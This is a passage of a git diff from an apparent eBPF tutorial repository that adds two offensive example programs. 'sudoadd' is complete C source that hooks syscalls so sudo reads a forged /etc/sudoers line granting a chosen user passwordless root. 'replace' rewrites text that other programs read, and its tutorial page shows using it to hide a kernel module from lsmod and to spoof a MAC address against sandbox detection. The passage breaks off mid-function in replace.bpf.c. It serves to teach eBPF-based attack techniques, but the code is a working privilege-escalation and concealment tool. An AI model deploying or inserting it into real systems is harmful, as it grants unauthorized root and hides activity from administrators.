$(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/26-sudo/common.h b/26-sudo/common.h new file mode 100644 index 0000000..3e51864 --- /dev/null +++ b/26-sudo/common.h @@ -0,0 +1,37 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 +#define max_payload_len 100 +#define sudoers_len 13 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/26-sudo/common_um.h b/26-sudo/common_um.h new file mode 100644 index 0000000..06267aa --- /dev/null +++ b/26-sudo/common_um.h @@ -0,0 +1,96 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_UM_H +#define BAD_BPF_COMMON_UM_H + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + + +#ifdef BAD_BPF_USE_TRACE_PIPE +static void read_trace_pipe(void) { + int trace_fd; + + trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0); + if (trace_fd == -1) { + printf("Error opening trace_pipe: %s\n", strerror(errno)); + return; + } + + while (!exiting) { + static char buf[4096]; + ssize_t sz; + + sz = read(trace_fd, buf, sizeof(buf) -1); + if (sz > 0) { + buf[sz] = '\x00'; + puts(buf); + } + } +} +#endif // BAD_BPF_USE_TRACE_PIPE + +#endif // BAD_BPF_COMMON_UM_H \ No newline at end of file diff --git a/26-sudo/index.html b/26-sudo/index.html new file mode 100644 index 0000000..2a8da3d --- /dev/null +++ b/26-sudo/index.html @@ -0,0 +1,211 @@ + + + + + + 使用 eBPF 添加 sudo 用户 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    使用 eBPF 添加 sudo 用户

    +

    编译:

    +
    make
    +
    +

    使用方式:

    +
    sudo ./sudoadd --username lowpriv-user
    +
    +

    这个程序允许一个通常权限较低的用户使用 sudo 成为 root。

    +

    它通过拦截 sudo 读取 /etc/sudoers 文件,并将第一行覆盖为 <username> ALL=(ALL:ALL) NOPASSWD:ALL # 的方式工作。这欺骗了 sudo,使其认为用户被允许成为 root。其他程序如 catsudoedit 不受影响,所以对于这些程序来说,文件未改变,用户并没有这些权限。行尾的 # 确保行的其余部分被当作注释处理,因此不会破坏文件的逻辑。

    +

    参考资料

    + + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/26-sudo/sudoadd.bpf.c b/26-sudo/sudoadd.bpf.c new file mode 100644 index 0000000..610d83a --- /dev/null +++ b/26-sudo/sudoadd.bpf.c @@ -0,0 +1,215 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to hold the File Descriptors from 'openat' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, unsigned int); +} map_fds SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buff_addrs SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// The UserID of the user, if we're restricting +// running to just this user +const volatile int uid = 0; + +// These store the string we're going to +// add to /etc/sudoers when viewed by sudo +// Which makes it think our user can sudo +// without a password +const volatile int payload_len = 0; +const volatile char payload[max_payload_len]; + +SEC("tp/syscalls/sys_enter_openat") +int handle_openat_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Check comm is sudo + char comm[TASK_COMM_LEN]; + bpf_get_current_comm(comm, sizeof(comm)); + const int sudo_len = 5; + const char *sudo = "sudo"; + for (int i = 0; i < sudo_len; i++) { + if (comm[i] != sudo[i]) { + return 0; + } + } + + // Now check we're opening sudoers + const char *sudoers = "/etc/sudoers"; + char filename[sudoers_len]; + bpf_probe_read_user(&filename, sudoers_len, (char*)ctx->args[1]); + for (int i = 0; i < sudoers_len; i++) { + if (filename[i] != sudoers[i]) { + return 0; + } + } + bpf_printk("Comm %s\n", comm); + bpf_printk("Filename %s\n", filename); + + // If filtering by UID check that + if (uid != 0) { + int current_uid = bpf_get_current_uid_gid() >> 32; + if (uid != current_uid) { + return 0; + } + } + + // Add pid_tgid to map for our sys_exit call + unsigned int zero = 0; + bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_exit_openat") +int handle_openat_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + int pid = pid_tgid >> 32; + + // Set the map value to be the returned file descriptor + unsigned int fd = (unsigned int)ctx->ret; + bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_enter_read") +int handle_read_enter(struct trace_event_raw_sys_enter *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (pfd == 0) { + return 0; + } + + // Check this is the sudoers file descriptor + unsigned int map_fd = *pfd; + unsigned int fd = (unsigned int)ctx->args[0]; + if (map_fd != fd) { + return 0; + } + + // Store buffer address from arguments in map + long unsigned int buff_addr = ctx->args[1]; + bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY); + + // log and exit + size_t buff_size = (size_t)ctx->args[2]; + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int handle_read_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is reading our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + long unsigned int buff_addr = *pbuff_addr; + if (buff_addr <= 0) { + return 0; + } + + // This is amount of data returned from the read syscall + if (ctx->ret <= 0) { + return 0; + } + long int read_size = ctx->ret; + + // Add our payload to the first line + if (read_size < payload_len) { + return 0; + } + + // Overwrite first chunk of data + // then add '#'s to comment out rest of data in the chunk. + // This sorta corrupts the sudoers file, but everything still + // works as expected + char local_buff[max_payload_len] = { 0x00 }; + bpf_probe_read(&local_buff, max_payload_len, (void*)buff_addr); + for (unsigned int i = 0; i < max_payload_len; i++) { + if (i >= payload_len) { + local_buff[i] = '#'; + } + else { + local_buff[i] = payload[i]; + } + } + // Write data back to buffer + long ret = bpf_probe_write_user((void*)buff_addr, local_buff, max_payload_len); + + // Send event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + return 0; +} + +SEC("tp/syscalls/sys_exit_close") +int handle_close_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check if we're a process thread of interest + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + + // Closing file, delete fd from all maps to clean up + bpf_map_delete_elem(&map_fds, &pid_tgid); + bpf_map_delete_elem(&map_buff_addrs, &pid_tgid); + + return 0; +} diff --git a/26-sudo/sudoadd.c b/26-sudo/sudoadd.c new file mode 100644 index 0000000..fc6e1f3 --- /dev/null +++ b/26-sudo/sudoadd.c @@ -0,0 +1,175 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include "sudoadd.skel.h" +#include "common_um.h" +#include "common.h" +#include + +#define INVALID_UID -1 +// https://stackoverflow.com/questions/3836365/how-can-i-get-the-user-id-associated-with-a-login-on-linux +uid_t lookup_user(const char *name) +{ + if(name) { + struct passwd *pwd = getpwnam(name); /* don't free, see getpwnam() for details */ + if(pwd) return pwd->pw_uid; + } + return INVALID_UID; +} + +// Setup Argument stuff +#define max_username_len 20 +static struct env { + char username[max_username_len]; + bool restrict_user; + int target_ppid; +} env; + +const char *argp_program_version = "sudoadd 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"SUDO Add\n" +"\n" +"Enable a user to elevate to root\n" +"by lying to 'sudo' about the contents of /etc/sudoers file\n" +"\n" +"USAGE: ./sudoadd -u username [-t 1111] [-r uid]\n"; + +static const struct argp_option opts[] = { + { "username", 'u', "USERNAME", 0, "Username of user to " }, + { "restrict", 'r', NULL, 0, "Restict to only run when sudo is executed by the matching user" }, + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 'u': + if (strlen(arg) >= max_username_len) { + fprintf(stderr, "Username must be less than %d characters\n", max_username_len); + argp_usage(state); + } + strncpy(env.username, arg, sizeof(env.username)); + break; + case 'r': + env.restrict_user = true; + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case 'h': + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Tricked Sudo PID %d to allow user to become root\n", e->pid); + else + printf("Failed to trick Sudo PID %d to allow user to become root\n", e->pid); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct sudoadd_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + if (env.username[0] == '\x00') { + printf("Username Requried, see %s --help\n", argv[0]); + exit(1); + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = sudoadd_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Let bpf program know our pid so we don't get kiled by it + skel->rodata->target_ppid = env.target_ppid; + + // Copy in username + sprintf(skel->rodata->payload, "%s ALL=(ALL:ALL) NOPASSWD:ALL #", env.username); + skel->rodata->payload_len = strlen(skel->rodata->payload); + + // If restricting by UID, look it up and set it + // as this can't really be done by eBPF program + if (env.restrict_user) { + int uid = lookup_user(env.username); + if (uid == INVALID_UID) { + printf("Couldn't get UID for user %s\n", env.username); + goto cleanup; + } + skel->rodata->uid = uid; + } + + // Verify and load program + err = sudoadd_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Attach tracepoint handler + err = sudoadd_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + sudoadd_bpf__destroy( skel); + return -err; +} diff --git a/27-replace/.gitignore b/27-replace/.gitignore new file mode 100644 index 0000000..d630f18 --- /dev/null +++ b/27-replace/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +replace diff --git a/27-replace/LICENSE b/27-replace/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/27-replace/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/27-replace/Makefile b/27-replace/Makefile new file mode 100644 index 0000000..e696bfd --- /dev/null +++ b/27-replace/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = replace # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/27-replace/common.h b/27-replace/common.h new file mode 100644 index 0000000..1fda5c3 --- /dev/null +++ b/27-replace/common.h @@ -0,0 +1,39 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +#define LOCAL_BUFF_SIZE 64 +#define loop_size 64 +#define text_len_max 20 + +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/27-replace/index.html b/27-replace/index.html new file mode 100644 index 0000000..390dbcd --- /dev/null +++ b/27-replace/index.html @@ -0,0 +1,219 @@ + + + + + + 使用 eBPF 替换任意程序读取或写入的文本 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    使用 eBPF 替换任意程序读取或写入的文本

    +

    编译:

    +
    make
    +
    +

    使用方式:

    +
    sudo ./replace --filename /path/to/file --input foo --replace bar
    +
    +

    这个程序将文件中所有与 input 匹配的文本替换为 replace 文本。 +这有很多用途,例如:

    +

    隐藏内核模块 joydev,避免被如 lsmod 这样的工具发现:

    +
    ./replace -f /proc/modules -i 'joydev' -r 'cryptd'
    +
    +

    伪造 eth0 接口的 MAC 地址:

    +
    ./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00'
    +
    +

    恶意软件进行反沙箱检查可能会检查 MAC 地址,寻找是否正在虚拟机或沙箱内运行,而不是在“真实”的机器上运行的迹象。

    +

    注意: inputreplace 的长度必须相同,以避免在文本块的中间添加 NULL 字符。在 bash 提示符下输入换行符,使用 $'\n',例如 --replace $'text\n'

    +

    参考资料

    + + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/27-replace/replace.bpf.c b/27-replace/replace.bpf.c new file mode 100644 index 0000000..019b6cf --- /dev/null +++ b/27-replace/replace.bpf.c @@ -0,0 +1,333 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to hold the File Descriptors from 'openat' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, unsigned int); +} map_fds SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buff_addrs SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +// NOTE: This should probably be a map-of-maps, with the top-level +// key bing pid_tgid, so we know we're looking at the right program +#define MAX_POSSIBLE_ADDRS 500 +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_name_addrs SEC(".maps"); +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_to_replace_addrs SEC(".maps"); + +// Map holding the programs for tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the name of the file to replace text in +const volatile int filename_len = 0; +const volatile char filename[50]; + +// These store the text to find and replace in the file +const volatile unsigned int text_len = 0; +const volatile char text_find[FILENAME_LEN_MAX]; +const volatile char text_replace[FILENAME_LEN_MAX]; + +SEC("tp/syscalls/sys_exit_close") +int handle_close_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check if we're a process thread of interest + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + + // Closing file, delete fd from all maps to clean up + bpf_map_delete_elem(&map_fds, &pid_tgid); + bpf_map_delete_elem(&map_buff_addrs, &pid_tgid); + + return 0; +} + +SEC("tp/syscalls/sys_enter_openat") +int handle_openat_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Get filename from arguments + char check_filename[FILENAME_LEN_MAX]; + bpf_probe_read_user(&check_filename, filename_len, (char*)ctx->args[1]); + + // Check filename is our target + for (int i = 0; i < filename_len; i++) { + if (filename[i] != check_filename[i]) { + return 0; + } + } + + // Add pid_tgid to map for our sys_exit call + unsigned int zero = 0; + bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY); + + bpf_printk("[TEXT_REPLACE] PID %d Filename %s\n", pid, filename); + return 0; +} + +SEC("tp/syscalls/sys_exit_openat") +int handle_openat_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + int pid = pid_tgid >> 32; + + // Set the map value to be the returned file descriptor + unsigned int fd = (unsigned int)ctx->ret; + bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_enter_read") +int handle_read_enter(struct trace_event_raw_sys_enter *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (pfd == 0) { + return 0; + } + + // Check this is the correct file descriptor + unsigned int map_fd = *pfd; + unsigned int fd = (unsigned int)ctx->args[0]; + if (map_fd != fd) { + return 0; + } + + // Store buffer address from arguments in map + long unsigned int buff_addr = ctx->args[1]; + bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY); + + // log and exit + size_t buff_size = (size_t)ctx->args[2]; + bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx\n", pid, fd, buff_addr); + bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_size %lu\n", pid, fd, buff_size); + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int find_possible_addrs(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is reading 